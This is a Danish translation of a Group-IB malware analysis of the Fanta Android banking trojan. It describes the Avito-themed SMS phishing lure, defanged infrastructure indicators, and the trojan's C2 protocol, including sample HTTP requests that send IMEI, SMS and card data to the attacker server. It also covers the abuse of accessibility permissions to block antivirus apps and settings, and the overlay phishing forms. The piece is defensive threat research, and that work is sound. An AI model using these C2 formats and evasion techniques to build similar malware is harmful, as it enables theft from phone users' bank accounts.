En dag vil du sælge noget på Avito, og efter at have postet en detaljeret beskrivelse af dit produkt (for eksempel et RAM-modul), vil du modtage denne besked:
Når du åbner linket, vil du se en tilsyneladende harmløs side, der giver dig, den glade og succesrige sælger, besked om, at et køb er blevet foretaget:
Når du klikker på knappen "Fortsæt", downloades en APK-fil med et ikon og et tillidsskabende navn til din Android-enhed. Du installerede et program, der af en eller anden grund anmodede om AccessibilityService-rettigheder, så dukkede et par vinduer op og forsvandt hurtigt og... Det var det.
Du går for at tjekke din saldo, men af en eller anden grund beder din bankapp om dine kortoplysninger igen. Efter at have indtastet dataene, sker der noget forfærdeligt: af en eller anden grund, der stadig er uklar for dig, begynder penge at forsvinde fra din konto. Du forsøger at løse problemet, men din telefon modstår: den trykker på tasterne "Tilbage" og "Hjem", slukker ikke og tillader dig ikke at aktivere nogen sikkerhedsforanstaltninger. Som et resultat står du tilbage uden penge, dine varer er ikke blevet købt, du er forvirret og spekulerer på: hvad skete der?
Svaret er enkelt: du er blevet et offer for Fanta Android Trojan, et medlem af Flexnet-familien. Hvordan skete dette? Lad os forklare nu.
Forfattere: Andrey Polovinkin, junior specialist i malware-analyse, Ivan Pisarev, specialist i malware-analyse.
Nogle statistikker
Flexnet-familien af Android-trojanske heste blev først kendt tilbage i 2015. Over en temmelig lang aktivitetsperiode udvidede familien sig til flere underarter: Fanta, Limebot, Lipton osv. Trojaneren, såvel som infrastrukturen forbundet med den, står ikke stille: nye effektive distributionsordninger er ved at blive udviklet - i vores tilfælde højkvalitets phishing-sider rettet mod en specifik bruger-sælger, og de trojanske udviklere følger modetrends i virusskrivning - tilføjer ny funktionalitet, der gør det muligt at stjæle mere effektivt penge fra inficerede enheder og omgå beskyttelsesmekanismer.
Kampagnen beskrevet i denne artikel er rettet mod brugere fra Rusland; et lille antal inficerede enheder blev registreret i Ukraine, og endnu færre i Kasakhstan og Hviderusland.
Selvom Flexnet har været i Android Trojan-arenaen i over 4 år nu og er blevet undersøgt i detaljer af mange forskere, er det stadig i god form. Fra januar 2019 er den potentielle skademængde mere end 35 millioner rubler - og dette er kun for kampagner i Rusland. I 2015 blev forskellige versioner af denne Android-trojaner solgt på underjordiske fora, hvor trojanerens kildekode med en detaljeret beskrivelse også kunne findes. Det betyder, at statistikken over skader i verden er endnu mere imponerende. Ikke en dårlig indikator for sådan en gammel mand, vel?
Fra salg til bedrag
Som det kan ses fra det tidligere præsenterede skærmbillede af en phishing-side til internettjenesten til at sende annoncer Avito, var den forberedt til et specifikt offer. Tilsyneladende bruger angriberne en af Avitos parsere, som udtrækker telefonnummeret og navnet på sælgeren samt produktbeskrivelsen. Efter at have udvidet siden og forberedt APK-filen, får offeret tilsendt en SMS med sit navn og et link til en phishing-side, der indeholder en beskrivelse af hans produkt og det beløb, der er modtaget fra "salget" af produktet. Ved at klikke på knappen modtager brugeren en ondsindet APK-fil - Fanta.
En undersøgelse af shcet491[.]ru-domænet viste, at det er uddelegeret til Hostingers DNS-servere:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domænezonefilen indeholder indgange, der peger på IP-adresserne 31.220.23[.]236, 31.220.23[.]243 og 31.220.23[.]235. Domænets primære ressourcerecord (A record) peger dog på en server med IP-adressen 178.132.1[.]240.
IP-adressen 178.132.1[.]240 er placeret i Holland og tilhører hosteren WorldStream. IP-adresserne 31.220.23[.]235, 31.220.23[.]236 og 31.220.23[.]243 er placeret i Storbritannien og tilhører den delte hostingserver HOSTINGER. Brugt som optager openprov-ru. Følgende domæner blev også løst til IP-adressen 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Det skal bemærkes, at links i følgende format var tilgængelige fra næsten alle domæner:
http://(www.){0,1}<%domain%>/[0-9]{7}
Denne skabelon indeholder også et link fra en SMS-besked. Baseret på historiske data blev det fundet, at ét domæne svarer til flere links i det ovenfor beskrevne mønster, hvilket indikerer, at ét domæne blev brugt til at distribuere trojaneren til flere ofre.
Lad os springe lidt videre: Trojaneren, der downloades via et link fra en SMS, bruger adressen som kontrolserver onusedseddohap[.]klub. Dette domæne blev registreret 2019-03-12, og fra 2019-04-29 interagerede APK-applikationer med dette domæne. Baseret på data opnået fra VirusTotal interagerede i alt 109 applikationer med denne server. Selve domænet blev løst til IP-adressen 217.23.14[.]27, beliggende i Holland og ejes af værten WorldStream. Brugt som optager NameCheap. Domæner er også løst til denne IP-adresse bad-racoon[.]klub (startende fra 2018-09-25) og bad-racoon[.]live (startende fra 2018-10-25). Med domæne bad-racoon[.]klub mere end 80 APK-filer interageret med bad-racoon[.]live - mere end 100.
Generelt forløber angrebet som følger:
Hvad er der under Fantas låg?
Som mange andre Android-trojanske heste er Fanta i stand til at læse og sende SMS-beskeder, lave USSD-anmodninger og vise sine egne vinduer oven på applikationer (inklusive banker). Imidlertid er arsenalet af funktionalitet i denne familie ankommet: Fanta begyndte at bruge Tilgængelighedsservice til forskellige formål: at læse indholdet af meddelelser fra andre applikationer, forhindre registrering og standse udførelsen af en trojaner på en inficeret enhed osv. Fanta virker på alle versioner af Android, der ikke er yngre end 4.4. I denne artikel vil vi se nærmere på følgende Fanta-eksempel:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Umiddelbart efter lancering
Umiddelbart efter lanceringen skjuler trojaneren sit ikon. Applikationen kan kun fungere, hvis navnet på den inficerede enhed ikke er på listen:
- android_x86
- VirtualBox
- Nexus 5X (bulhead)
- Nexus 5 (barbermaskine)
Denne kontrol udføres i trojanerens hovedtjeneste - Hovedservice. Når den startes for første gang, initialiseres applikationens konfigurationsparametre til standardværdier (formatet til lagring af konfigurationsdata og deres betydning vil blive diskuteret senere), og en ny inficeret enhed registreres på kontrolserveren. En HTTP POST-anmodning med meddelelsestypen vil blive sendt til serveren register_bot og oplysninger om den inficerede enhed (Android-version, IMEI, telefonnummer, operatørnavn og landekode, hvor operatøren er registreret). Adressen fungerer som kontrolserver hXXp://onuseseddohap[.]club/controller.php. Som svar sender serveren en besked, der indeholder felterne bot_id, bot_pwd, server — applikationen gemmer disse værdier som parametre for CnC-serveren. Parameter server valgfrit, hvis feltet ikke blev modtaget: Fanta bruger registreringsadressen - hXXp://onuseseddohap[.]club/controller.php. Funktionen med at ændre CnC-adressen kan bruges til at løse to problemer: at fordele belastningen jævnt mellem flere servere (med et stort antal inficerede enheder kan belastningen på en uoptimeret webserver være høj), og også at bruge et alternativ server i tilfælde af fejl på en af CnC-serverne.
Hvis der opstår en fejl under afsendelse af anmodningen, vil trojaneren gentage registreringsprocessen efter 20 sekunder.
Når enheden er blevet registreret, viser Fanta følgende besked til brugeren:
Vigtig bemærkning: tjenesten ringede System sikkerhed — navnet på den trojanske tjeneste, og efter at have klikket på knappen ОК Et vindue åbnes med tilgængelighedsindstillingerne for den inficerede enhed, hvor brugeren skal give tilgængelighedsrettigheder til den ondsindede tjeneste:
Så snart brugeren tænder Tilgængelighedsservice, Fanta får adgang til indholdet af programvinduer og de handlinger, der udføres i dem:
Umiddelbart efter at have modtaget tilgængelighedsrettigheder, anmoder trojaneren om administratorrettigheder og rettigheder til at læse meddelelser:
Ved at bruge AccessibilityService simulerer applikationen tastetryk og giver sig selv alle de nødvendige rettigheder.
Fanta opretter flere databaseforekomster (som vil blive beskrevet senere), der er nødvendige for at gemme konfigurationsdata, såvel som information indsamlet i processen om den inficerede enhed. For at sende den indsamlede information opretter trojaneren en gentagende opgave designet til at downloade felter fra databasen og modtage en kommando fra kontrolserveren. Intervallet for adgang til CnC er indstillet afhængigt af Android-versionen: i tilfælde af 5.1 vil intervallet være 10 sekunder, ellers 60 sekunder.
For at modtage kommandoen fremsætter Fanta en anmodning GetTask til administrationsserveren. Som svar kan CnC sende en af følgende kommandoer:
| Team | beskrivelse |
|---|---|
| 0 | Send SMS besked |
| 1 | Foretag et telefonopkald eller USSD-kommando |
| 2 | Opdaterer en parameter interval |
| 3 | Opdaterer en parameter opfange |
| 6 | Opdaterer en parameter smsManager |
| 9 | Begynd at indsamle SMS-beskeder |
| 11 | Nulstil din telefon til fabriksindstillingerne |
| 12 | Aktiver/deaktiver logning af dialogboksoprettelse |
Fanta indsamler også notifikationer fra 70 bankapps, hurtige betalingssystemer og e-wallets og gemmer dem i en database.
Lagring af konfigurationsparametre
For at gemme konfigurationsparametre bruger Fanta en standardtilgang til Android-platformen - Indstillinger-filer. Indstillingerne gemmes i en fil med navnet indstillinger. En beskrivelse af de gemte parametre findes i tabellen nedenfor.
| navn | Standard værdi | Mulige værdier | beskrivelse |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Kontrolserveradresse |
| pwd | — | String | Serveradgangskode |
| interval | 20 | Integer | Tids interval. Angiver, hvor længe følgende opgaver skal udskydes:
|
| opfange | alle | alle/tlf.nummer | Hvis feltet er lig med strengen alle eller telNr, så vil den modtagne SMS-besked blive opsnappet af applikationen og ikke vist til brugeren |
| smsManager | 0 | 0/1 | Aktiver/deaktiver applikationen som standard SMS-modtager |
| readDialog | falsk | Sandt falsk | Aktiver/deaktiver hændelseslogning Tilgængelighedsbegivenhed |
Fanta bruger også filen smsManager:
| navn | Standard værdi | Mulige værdier | beskrivelse |
|---|---|---|---|
| pckg | — | String | Navnet på den anvendte SMS-beskedadministrator |
Interaktion med databaser
Under sin drift bruger trojaneren to databaser. Database navngivet a bruges til at gemme forskellige oplysninger indsamlet fra telefonen. Den anden database er navngivet fanta.db og bruges til at gemme indstillinger, der er ansvarlige for at oprette phishing-vinduer designet til at indsamle oplysninger om bankkort.
Trojan bruger database а at gemme indsamlede oplysninger og logge dine handlinger. Data gemmes i en tabel logs. For at oprette en tabel skal du bruge følgende SQL-forespørgsel:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Databasen indeholder følgende oplysninger:
1. Logger opstarten af den inficerede enhed med en besked Telefonen tændte!
2. Meddelelser fra applikationer. Meddelelsen genereres i henhold til følgende skabelon:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkortdata fra phishing-formularer oprettet af trojaneren. Parameter VIEW_NAME kan være en af følgende:
- AliExpress
- Avito
- Google Play
- Diverse <%App Name%>
Meddelelsen logges i formatet:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Indgående/udgående SMS-beskeder i formatet:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Oplysninger om pakken, der opretter dialogboksen i formatet:
(<%Package name%>)<%Package information%>
Eksempel tabel logs:
En af funktionerne i Fanta er indsamling af oplysninger om bankkort. Dataindsamling sker gennem oprettelse af phishing-vinduer, når du åbner bankapplikationer. Trojaneren opretter kun phishing-vinduet én gang. Oplysninger om, at vinduet blev vist til brugeren, gemmes i en tabel indstillinger i databasen fanta.db. For at oprette en database skal du bruge følgende SQL-forespørgsel:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Alle tabelfelter indstillinger som standard initialiseret til 1 (opret et phishing-vindue). Efter at brugeren har indtastet deres data, vil værdien blive sat til 0. Eksempel på tabelfelter indstillinger:
- can_login — feltet er ansvarligt for at vise formularen, når en bankansøgning åbnes
- første_bank - anvendes ikke
- can_avito — feltet er ansvarligt for at vise formularen, når du åbner Avito-applikationen
- kan_ali — feltet er ansvarligt for at vise formularen, når du åbner Aliexpress-applikationen
- kan_anden — feltet er ansvarligt for at vise formularen, når du åbner en ansøgning fra listen: Yula, Pandao, Drom Auto, tegnebog. Rabat- og bonuskort, Aviasales, Booking, Trivago
- can_card — feltet er ansvarlig for at vise formularen ved åbning Google Play
Interaktion med administrationsserveren
Netværksinteraktion med administrationsserveren sker via HTTP-protokollen. Til at arbejde med netværket bruger Fanta det populære Retrofit-bibliotek. Anmodninger sendes til: hXXp://onuseseddohap[.]club/controller.php. Serveradressen kan ændres ved registrering på serveren. Cookies kan sendes som svar fra serveren. Fanta sender følgende anmodninger til serveren:
- Registrering af botten på kontrolserveren sker én gang ved første lancering. Følgende data om den inficerede enhed sendes til serveren:
· Cookie — cookies modtaget fra serveren (standardværdien er en tom streng)
· tilstand — strengkonstant register_bot
· præfiks — heltalskonstant 2
· version_sdk — er dannet efter følgende skabelon: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI for den inficerede enhed
· land — kode for det land, hvor operatøren er registreret, i ISO-format
· nummer - telefonnummer
· operatør — operatørens navnEt eksempel på en anmodning sendt til serveren:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Som svar på anmodningen skal serveren returnere et JSON-objekt, der indeholder følgende parametre:
· bot_id — ID for den inficerede enhed. Hvis bot_id er lig med 0, vil Fanta genudføre anmodningen.
bot_pwd — adgangskode til serveren.
server — kontrolserveradresse. Valgfri parameter. Hvis parameteren ikke er angivet, vil den adresse, der er gemt i applikationen, blive brugt.Eksempel JSON-objekt:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Anmod om at modtage en kommando fra serveren. Følgende data sendes til serveren:
· Cookie — cookies modtaget fra serveren
· bud — id for den inficerede enhed, der blev modtaget, da anmodningen blev sendt register_bot
· pwd - adgangskode til serveren
· divice_admin — feltet bestemmer, om der er opnået administratorrettigheder. Hvis der er opnået administratorrettigheder, er feltet lig med 1, Ellers 0
· Tilgængelighed — Driftsstatus for tilgængelighedstjenesten. Hvis tjenesten blev startet, er værdien 1, Ellers 0
· SMSManager — viser, om trojaneren er aktiveret som standardapplikation til at modtage SMS
· skærm — viser, hvilken tilstand skærmen er i. Værdien vil blive indstillet 1, hvis skærmen er tændt, ellers 0;Et eksempel på en anmodning sendt til serveren:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Afhængigt af kommandoen kan serveren returnere et JSON-objekt med forskellige parametre:
· Team Send SMS besked: Parametrene indeholder telefonnummeret, teksten i SMS-beskeden og ID'et for den besked, der sendes. Identifikationen bruges, når der sendes en besked til serveren med type sætSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Team Foretag et telefonopkald eller USSD-kommando: Telefonnummeret eller kommandoen kommer i svarteksten.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Team Skift intervalparameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Team Skift intercept-parameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Team Skift SmsManager felt.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Team Saml SMS-beskeder fra en inficeret enhed.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Team Nulstil din telefon til fabriksindstillingerne:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Team Skift ReadDialog parameter.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Sender en besked med type sætSmsStatus. Denne anmodning foretages efter kommandoen er udført Send SMS besked. Anmodningen ser således ud:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Upload af databaseindhold. En række sendes pr. anmodning. Følgende data sendes til serveren:
· Cookie — cookies modtaget fra serveren
· tilstand — strengkonstant sætSaveInboxSms
· bud — id for den inficerede enhed, der blev modtaget, da anmodningen blev sendt register_bot
· tekst — tekst i den aktuelle databasepost (felt d fra bordet logs i databasen а)
· nummer — navnet på den aktuelle databasepost (felt p fra bordet logs i databasen а)
· sms_mode — heltalsværdi (felt m fra bordet logs i databasen а)Anmodningen ser således ud:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Hvis det lykkes at sende til serveren, slettes rækken fra tabellen. Eksempel på et JSON-objekt returneret af serveren:
{ "response":[], "status":"ok" }
Interagere med AccessibilityService
AccessibilityService blev implementeret for at gøre Android-enheder nemmere at bruge for mennesker med handicap. I de fleste tilfælde kræves fysisk interaktion for at interagere med en applikation. AccessibilityService giver dig mulighed for at gøre dem programmatisk. Fanta bruger tjenesten til at skabe falske vinduer i bankapplikationer og forhindre brugere i at åbne systemindstillinger og nogle applikationer.
Ved at bruge funktionaliteten i AccessibilityService overvåger trojaneren ændringer af elementer på skærmen på den inficerede enhed. Som tidligere beskrevet indeholder Fanta-indstillingerne en parameter, der er ansvarlig for logning af operationer med dialogbokse - readDialog. Hvis denne parameter er indstillet, vil oplysninger om navnet og beskrivelsen af den pakke, der udløste hændelsen, blive tilføjet til databasen. Trojaneren udfører følgende handlinger, når hændelser udløses:
- Simulerer at trykke på tilbage- og hjemtasterne i følgende tilfælde:
· hvis brugeren ønsker at genstarte sin enhed
· hvis brugeren ønsker at slette "Avito"-applikationen eller ændre adgangsrettigheder
· hvis der er en omtale af "Avito"-applikationen på siden
· når du åbner Google Play Protect-appen
· når du åbner sider med AccessibilityService-indstillinger
· når dialogboksen Systemsikkerhed vises
· når du åbner siden med indstillingerne "Tegn over anden app".
· når du åbner siden "Applikationer", "Sikkerhedskopiering og nulstilling", "Nulstilling af data", "Nulstil indstillinger", "Udviklerpanel", "Special. muligheder", "Særlige muligheder", "Særlige rettigheder"
· hvis hændelsen blev genereret af visse applikationer.Liste over applikationer
- android
- Master Lite
- Clean Master
- Clean Master til x86 CPU
- Meizu Application Permission Management
- MIUI Sikkerhed
- Clean Master - Antivirus & Cache og Garbage Cleaner
- Forældrekontrol og GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobil AntiVirus Security PRO
- Avast antivirus og gratis beskyttelse 2019
- Mobil sikkerhed MegaFon
- AVG Protection til Xperia
- Mobil sikkerhed
- Malwarebytes Antivirus og beskyttelse
- Antivirus til Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus til Huawei tablet System Manager
- Samsung tilgængelighed
- Samsung Smart Manager
- Sikkerhedsmester
- Speed Booster
- dr.web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus og mobil sikkerhed
- Kaspersky Internet Security: Antivirus og beskyttelse
- Kaspersky batterilevetid: Saver & Booster
- Kaspersky Endpoint Security - beskyttelse og administration
- AVG Antivirus gratis 2019 – Beskyttelse til Android
- Android antivirus
- Norton Mobile Security og Antivirus
- Antivirus, firewall, VPN, mobil sikkerhed
- Mobil sikkerhed: antivirus, VPN, tyveribeskyttelse
- Antivirus til Android
- Hvis der anmodes om tilladelse, når du sender en SMS-besked til et kort nummer, simulerer Fanta at klikke på afkrydsningsfeltet Husk valg og knap at sende.
- Når du forsøger at fjerne administratorrettigheder fra trojaneren, låser den telefonens skærm.
- Forhindrer tilføjelse af nye administratorer.
- Hvis antivirusprogrammet dr.web opdagede en trussel, imiterer Fanta at trykke på knappen ignorere.
- Trojaneren simulerer at trykke på tilbage- og hjem-knappen, hvis hændelsen blev genereret af applikationen Samsung Device Care.
- Fanta opretter phishing-vinduer med formularer til indtastning af oplysninger om bankkort, hvis en applikation fra en liste, der omfatter omkring 30 forskellige internettjenester, blev lanceret. Blandt dem: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto osv.
Phishing-formularer
Fanta analyserer, hvilke applikationer der kører på den inficerede enhed. Hvis en interesseansøgning blev åbnet, viser trojaneren et phishing-vindue oven på alle andre, som er en formular til indtastning af bankkortoplysninger. Brugeren skal indtaste følgende data:
- Kortnummer
- Kortets udløbsdato
- CVV
- Kortholders navn (ikke for alle banker)
Afhængigt af det kørende program vil forskellige phishing-vinduer blive vist. Nedenfor er eksempler på nogle af dem:
AliExpress:
Avito:
For nogle andre applikationer, f.eks. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Hvordan det egentlig var
Heldigvis viste den person, der modtog SMS-beskeden beskrevet i begyndelsen af artiklen, sig at være en cybersikkerhedsspecialist. Derfor adskiller den rigtige, ikke-instruktørs version sig fra den, der blev fortalt tidligere: en person modtog en interessant SMS, hvorefter han gav den til Group-IB Threat Hunting Intelligence-teamet. Resultatet af angrebet er denne artikel. God slutning, ikke? Det er dog ikke alle historier, der ender så vellykket, og for at din ikke skal ligne en instruktørs snit med et tab af penge, er det i de fleste tilfælde nok at overholde følgende længe beskrevne regler:
- Installer ikke applikationer til en mobilenhed med Android OS fra andre kilder end Google Play
- Når du installerer en applikation, skal du være særlig opmærksom på de rettigheder, applikationen anmoder om
- vær opmærksom på udvidelserne af downloadede filer
- installere Android OS-opdateringer regelmæssigt
- besøg ikke mistænkelige ressourcer og download ikke filer derfra
- Klik ikke på links modtaget i SMS-beskeder.
Kilde: www.habr.com